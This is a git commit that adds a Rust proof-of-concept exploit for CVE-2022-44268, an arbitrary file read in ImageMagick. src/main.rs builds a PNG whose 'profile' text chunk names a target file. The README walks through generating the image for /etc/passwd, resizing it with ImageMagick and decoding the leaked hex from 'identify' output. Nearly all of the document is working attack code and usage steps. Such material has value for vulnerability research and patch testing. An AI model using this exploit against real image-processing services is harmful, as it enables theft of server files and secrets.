initial commit

2023-02-05 19:47:37 +01:00 · 2023-02-05 19:47:37 +01:00 · 970bde4f76
commit 970bde4f76
parent 114606ac02
10 changed files with 151 additions and 2 deletions
--- a/.gitignore
+++ b/.gitignore
@ -0,0 +1,14 @@
+# Generated by Cargo
+# will have compiled files and executables
+debug/
+target/
+
+# Remove Cargo.lock from gitignore if creating an executable, leave it for libraries
+# More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html
+Cargo.lock
+
+# These are backup files generated by rustfmt
+**/*.rs.bk
+
+# MSVC Windows builds of rustc generate these, which store debugging information
+*.pdb
--- a/Cargo.lock
+++ b/Cargo.lock
@ -0,0 +1,75 @@
+# This file is automatically @generated by Cargo.
+# It is not intended for manual editing.
+version = 3
+
+[[package]]
+name = "adler"
+version = "1.0.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f26201604c87b1e01bd3d98f8d5d9a8fcbb815e8cedb41ffccbeb4bf593a35fe"
+
+[[package]]
+name = "bitflags"
+version = "1.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a"
+
+[[package]]
+name = "cfg-if"
+version = "1.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd"
+
+[[package]]
+name = "crc32fast"
+version = "1.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b540bd8bc810d3885c6ea91e2018302f68baba2129ab3e88f32389ee9370880d"
+dependencies = [
+ "cfg-if",
+]
+
+[[package]]
+name = "cve-2022-44268"
+version = "0.1.0"
+dependencies = [
+ "hex",
+ "png",
+]
+
+[[package]]
+name = "flate2"
+version = "1.0.25"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a8a2db397cb1c8772f31494cb8917e48cd1e64f0fa7efac59fbd741a0a8ce841"
+dependencies = [
+ "crc32fast",
+ "miniz_oxide",
+]
+
+[[package]]
+name = "hex"
+version = "0.4.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7f24254aa9a54b5c858eaee2f5bccdb46aaf0e486a595ed5fd8f86ba55232a70"
+
+[[package]]
+name = "miniz_oxide"
+version = "0.6.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b275950c28b37e794e8c55d88aeb5e139d0ce23fdbbeda68f8d7174abdf9e8fa"
+dependencies = [
+ "adler",
+]
+
+[[package]]
+name = "png"
+version = "0.17.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5d708eaf860a19b19ce538740d2b4bdeeb8337fa53f7738455e706623ad5c638"
+dependencies = [
+ "bitflags",
+ "crc32fast",
+ "flate2",
+ "miniz_oxide",
+]
--- a/Cargo.toml
+++ b/Cargo.toml
@ -0,0 +1,10 @@
+[package]
+name = "cve-2022-44268"
+version = "0.1.0"
+edition = "2021"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+hex = "0.4.3"
+png = "0.17.7"
--- a/README.md
+++ b/README.md
@ -1,2 +1,20 @@
-# CVE-2022-44268-
-A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read
+# CVE-2022-44268 ImageMagick Proof Of Concept PNG generator
+This is a proof of concept of the ImageMagick bug discovered by https://www.metabaseq.com/imagemagick-zero-days/
+
+## How to use
+
+### Clone the project
+`git clone https://github.com/voidz0r/CVE-2022-44268`
+
+### Run the project
+`cargo run "/etc/passwd"`
+
+### Use the file with ImageMagick
+`convert image.png -resize 50% output.png`
+
+### Analyze the resized image 
+`identify -verbose output.png`
+
+### Convert hex to str
+`python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a"))`
+
--- a/image.png
+++ b/image.png
--- a/screens/01_generating.png
+++ b/screens/01_generating.png
--- a/screens/02_resized_image.png
+++ b/screens/02_resized_image.png
--- a/screens/03_hex.png
+++ b/screens/03_hex.png
--- a/screens/04_result.png
+++ b/screens/04_result.png
--- a/src/main.rs
+++ b/src/main.rs
@ -0,0 +1,32 @@
+use std::path::Path;
+use std::fs::File;
+use std::io::BufWriter;
+
+fn multiply_bytes(buf_in: &[u8], mul: usize) -> Vec<u8> {
+    std::iter::repeat(buf_in)
+        .take(mul)
+        .flatten()
+        .cloned()
+        .collect::<Vec<u8>>()
+}
+
+fn main() {
+    let filepath = std::env::args().nth(1).expect("no path given");
+    let path = Path::new(r"./image.png");
+    let file = File::create(path).unwrap();
+    let ref mut w = BufWriter::new(file);
+    let mut encoder = png::Encoder::new(w, 200, 200); // Width is 2 pixels and height is 1.
+    encoder.set_color(png::ColorType::Rgba);
+    encoder.set_depth(png::BitDepth::Eight);
+    // Adding text chunks to the header
+    encoder.add_text_chunk(
+        "profile".to_string(),
+        filepath.to_string(),
+    )
+    .unwrap();
+    let mut writer = encoder.write_header().unwrap();
+
+    writer.write_image_data(&multiply_bytes(&[255, 0, 0, 255], 40000)).unwrap(); // Save
+    
+}
+